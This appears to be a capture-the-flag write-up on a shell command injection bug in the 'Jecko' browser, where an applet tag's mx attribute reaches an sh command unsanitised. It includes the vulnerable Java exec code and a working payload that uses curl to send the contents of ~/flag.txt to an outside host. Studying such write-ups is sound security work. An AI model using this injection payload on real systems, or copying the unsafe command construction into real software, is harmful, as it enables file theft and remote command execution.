History

Jecko 1-0

Finding Bugs

We were given 3 different versions of the Jecko browser so we compared their class files to see what changed. Only the Jecko class changed. We used JD-GUI to get Java source code from the class files and discovered that the visit method was modified quite a bit.

The Bug - Shell Command Injection

The bug appears when the browser attempts to run a Java applet on a webpage. The code for the applet is run in a limited security context so it can't perform dangerous actions such as reading local files. However, the browser runs the java applet by passing a shell command to sh. This opens up a world of possibilities. If we can have some control over the contents of the command, we may be able to get additional commands to run by taking advantage of sh's semicolon operator.

Looking at the source code, we found that the mx attribute of the applet tag is improperly sanitized. The code only checks to ensure that the mx attribute contains a number followed by an "m" and that that number is between 16 and 128 inclusive. We can surround that number followed by "m" with whatever text we'd like. The mx attribute is included verbatim in the command that is passed to sh.

The following snippet shows how the browser passes the java command to sh, making it vulnerable to command injection:

String[] params = { "/bin/sh", "-c", "java -Xmx" + mxAttribute + " -Djava.security.manager" + " -cp " + directoryOfApplet + " " + appletName };
Runtime.getRuntime().exec(params);

The Exploit

We began our mx attribute with "64m" to satisfy the validation code and then immediately ended the java command with a semicolon. Next we started our own command, which sent the user's flag to the judges. We ended the mx attribute with a pound sign to comment out the rest of the shell command that was created by the browser.

To exploit the bug, we included the following code on our webpage:

<applet code="Hello.class" mx="64m; curl http://10.0.3.50:7000/bots?t=rpisec\&k=`cat ~/flag.txt` #"></applet>

This applet tag steals and submits the user's flag to the judges as described above. Hello.class is just a java program that prints "Hello". It never gets run but it needs to exist and be downloadable by the browser to make the browser happy enough to reach the buggy code.

After visiting our webpage, the parameters that the browser sends to the exec method of a Runtime object look something like this:

String[] params = { "/bin/sh", "-c", "java -Xmx64m; curl http://10.0.3.50:7000/bots?t=rpisec\&k=`cat ~/flag.txt` # -Djava.security.manager -cp /tmp/jeckotmp273983720.applet Hello"};

Also available in: HTML TXT